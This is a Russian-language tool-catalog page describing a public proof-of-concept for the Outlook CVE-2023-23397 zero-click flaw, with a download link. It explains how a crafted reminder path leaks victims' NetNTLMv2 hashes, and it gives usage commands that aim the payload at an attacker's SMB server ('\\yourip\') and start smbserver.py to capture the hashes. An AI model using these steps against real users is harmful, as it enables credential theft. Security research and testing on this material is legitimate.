Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-23397 — Простой PoC уязвимости CVE-2023-23397 с полезной нагрузкой, отправляемой по электронной почте. | Kitploit
Инструменты/GitHubGitHub/trackflaw/cve-2023-23397
Инструменты фишингаАтаки на ПаролиГенерация полезной нагрузкиАнализ уязвимостейЭксплуатацияБезопасность Электронной Почты
GitHubtrackflaw/cve-2023-23397

CVE-2023-23397

Простой PoC уязвимости CVE-2023-23397 с полезной нагрузкой, отправляемой по электронной почте.

Репозиторий
132283 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-23397

Простой и грязный PoC уязвимости CVE-2023-23397, затрагивающей толстый клиент Outlook.

Описание

В Outlook отсутствует контроль над пользовательским вводом, который позволяет настраивать звук напоминаний о собраниях и событиях. Злоумышленник может заставить жертву подключиться к своему серверу без каких-либо действий со стороны пользователя (уязвимость нулевого клика).

Злоумышленник, эксплуатирующий эту уязвимость, получает дайджест NetNTLMv2 на основе пароля захваченного пользователя через SMB-запрос. Запрос срабатывает сразу после того, как письмо попадает во входящие.

Что делает PoC?

  1. Генерирует .msg полезную нагрузку.
  2. Отправляет её по электронной почте с помощью пользовательского SMTP-сервера.

Использование

В одном сеансе:

root@kitploit:~
python CVE-2023-23397.py

usage: CVE-2023-23397.py [-h] -p PATH
CVE-2023-23397.py: error: the following arguments are required: -p/--path

python CVE-2023-23397.py --path '\\yourip\'

Во втором сеансе (smbserver или responder, как вам удобно).

root@kitploit:~
smbserver.py -smb2support SHARE .

Демонстрация (ручной PoC)

poc

Поясняющее видео (на французском языке)

RÉCUPÉRER des mots de passe avec Microsoft OUTLOOK #CVE-2023-23397

Оригинальная статья

https://www.mdsec.co.uk/2023/03/exploiting-cve-2023-23397-microsoft-outlook-elevation-of-privilege-vulnerability/

Скачать инструмент